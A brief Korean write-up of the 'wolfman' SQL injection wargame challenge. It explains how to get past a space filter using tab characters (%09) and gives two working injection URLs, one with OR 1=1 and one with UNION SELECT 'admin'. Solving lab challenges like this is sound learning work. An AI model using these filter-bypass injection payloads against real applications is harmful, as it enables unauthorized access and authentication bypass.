preg_match('/ /i', $_GET[pw) 에 의해 공백 문자가 필터링 되고 있다.
이는 공백 대신 탭(%09) 문자를 사용하면 우회가 가능하다.
https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php?pw=%27%09OR%091=1--%09
- 쿼리 조회 시
id컬럼에 반환되는 값이admin이어야 문제 클리어가 가능하다. - 따라서, UNION 절을 이용하여 강제로 id 컬럼에
admin값이 반환되도록 유도하면 문제 클리어가 가능했다.
https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php?pw=%27%09UNION%09SELECT%09%27admin%27--%09
🐛.. 🐛.. 🐛..